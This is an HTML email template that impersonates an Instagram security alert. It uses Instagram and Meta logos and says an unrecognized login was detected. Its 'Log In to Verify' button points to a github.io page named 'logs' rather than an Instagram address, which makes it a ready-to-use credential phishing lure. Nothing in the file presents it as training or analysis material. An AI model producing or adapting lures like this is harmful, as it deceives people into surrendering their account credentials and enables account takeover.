<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram Account Security Alert</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #fafafa;
            color: #333;
            line-height: 1.6;
            margin: 0;
            padding: 20px;
        }
        .container {
            max-width: 600px;
            margin: 0 auto;
            padding: 20px;
            background-color: #fff;
            border: 1px solid #ddd;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }
        .logo {
            text-align: center;
            margin-bottom: 20px;
        }
        .logo img {
            width: 100px;
            height: auto;
        }
        .message {
            margin-bottom: 20px;
        }
        .action-button {
            display: inline-block;
            padding: 10px 20px;
            background-color: #3897f0;
            color: #fff;
            text-decoration: none;
            border-radius: 5px;
        }
        .footer {
            margin-top: 20px;
            font-size: 12px;
            color: #666;
        }
        .meta-logo {
            width: 20px; /* Adjust the size as needed */
            height: auto;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">
            <a href="https://www.instagram.com/">
                <img src="https://upload.wikimedia.org/wikipedia/commons/a/a5/Instagram_icon.png" alt="Instagram" width="30" height="30">
            </a>
        </div>
        <div class="message">
            <p>Dear Instagram user,</p>
            <p>We detected an attempt to log into your account from an unrecognized device and location. To secure your account, please log in and verify your identity.</p>
            <p>Click the button below to log in and verify your account:</p>
        </div>
        <div class="action">
            <a href="https://ractysean.github.io/logs/logs.html" class="action-button">Log In to Verify</a>
        </div>
        <div class="footer">
            <p>If this login attempt was not you, we recommend changing your password immediately after verifying your account.</p>
            <p>If you have any questions or need further assistance, please contact our support team.</p>
            <p>Thank you for helping us keep your account secure.</p>
            <p>Best regards,<br>Instagram Team</p>
            <div class="logo">
                <img class="meta-logo" src="https://ci3.googleusercontent.com/meips/ADKq_NZ2ivJHkv1KH9YS4Yecj8l99ueLszgAkXVAp0N50dD4Ymu0h1h6mxYcBJPC_sK-e9dLWuH1g-vgF844MKpudUUCekQ6pdY1QLsHcrt36zAkxpk=s0-d-e1-ft#https://static.xx.fbcdn.net/rsrc.php/v3/y3/r/Bqo9-L659wB.png" alt="">
            </div>
        </div>
    </div>
</body>
</html>
